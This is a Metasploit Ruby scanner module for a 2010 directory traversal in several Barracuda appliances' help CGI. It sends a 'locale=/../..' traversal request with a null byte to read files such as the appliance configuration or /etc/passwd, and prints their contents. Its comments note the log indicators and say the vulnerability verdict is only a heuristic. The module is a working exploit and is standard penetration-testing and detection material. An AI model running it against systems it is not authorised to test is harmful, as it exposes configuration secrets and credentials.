GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary scanner for the "locale" directory traversal in the Barracuda
# help CGI (advisories are listed under 'References').
#
# On the wire this is a single GET per host to TARGETURI (default
# /cgi-mod/view_help.cgi, default port 8000). Its query string is `locale=`
# followed by a run of `/..` segments, the FILE option and a trailing `%00`.
# Requests to that CGI whose `locale` value contains `..` or `%00` are
# therefore the thing to look for in appliance or proxy logs.
#
# The verdict is a heuristic built from substrings of the response body, so
# treat both "Vulnerable" and "Not vulnerable" as hints to be confirmed, not
# as proof of patch state.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Declares the module metadata and its options: RPORT (default 8000),
  # FILE (the remote path to request) and TARGETURI (the help CGI path).
  def initialize
    super(
      'Name' => 'Barracuda Multiple Product "locale" Directory Traversal',
      'Description' => %q{
        This module exploits a directory traversal vulnerability present in
        several Barracuda products, including the Barracuda Spam and Virus Firewall,
        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
        this module will attempt to download the Barracuda configuration file.
      },
      'References' => [
        ['OSVDB', '68301'],
        ['URL', 'https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/'],
        ['EDB', '15130']
      ],
      'Author' => [
        'Tiago Ferreira <tiago.ccna[at]gmail.com>'
      ],
      'DisclosureDate' => 'Oct 08 2010',
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
        OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
      ]
    )
  end

  # Sends one traversal request to the current target and prints a verdict
  # derived from the response body.
  #
  # @param ip [String] address supplied by the scanner mixin; it is not read
  #   here, every message uses full_uri instead.
  def run_host(ip)
    base_path = normalize_uri(target_uri.path)
    wanted_file = datastore['FILE']
    # FILE is appended verbatim after the `/..` run and is followed by an
    # encoded NUL byte; neither value is validated or encoded by this module.
    query = "?locale=/../../../../../../..#{wanted_file}%00"

    print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")

    request = {
      'method' => 'GET',
      'uri' => base_path + query
    }
    # Second argument is the request timeout in seconds.
    res = send_request_raw(request, 25)

    if res.nil?
      print_error("#{full_uri} - Connection timed out")
      return
    end

    body = res.body

    if res.code != 200 || !body
      print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
    elsif (wrapped = body.match(/\<html\>(.*)\<\/html\>/im)).nil?
      print_error("#{full_uri} - Barracuda - No HTML was returned")
    elsif body =~ /barracuda\.css/
      html = wrapped[1]

      # NOTE(review): the 100-character threshold is a heuristic. A short
      # target file lands in the "too short" branch, and any long page that
      # references barracuda.css is reported as vulnerable. Confirm by
      # reading the printed output.
      if html.length > 100
        # Drop every HTML tag so only the text content is printed.
        file_data = html.gsub(%r{</?[^>]+?>}, '')

        print_good("#{full_uri} - Barracuda - Vulnerable")
        print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
      else
        print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
      end
    elsif body =~ /help_page/
      # A body mentioning help_page is read as the fixed behaviour; the
      # question mark in the message reflects that this is a guess.
      print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
    else
      print_error("#{full_uri} - Barracuda - File not found or permission denied")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE
    # Connection-level failures are dropped without any output, presumably
    # so that one unreachable host does not interrupt the scan. A host that
    # prints nothing was not necessarily tested.
  end
end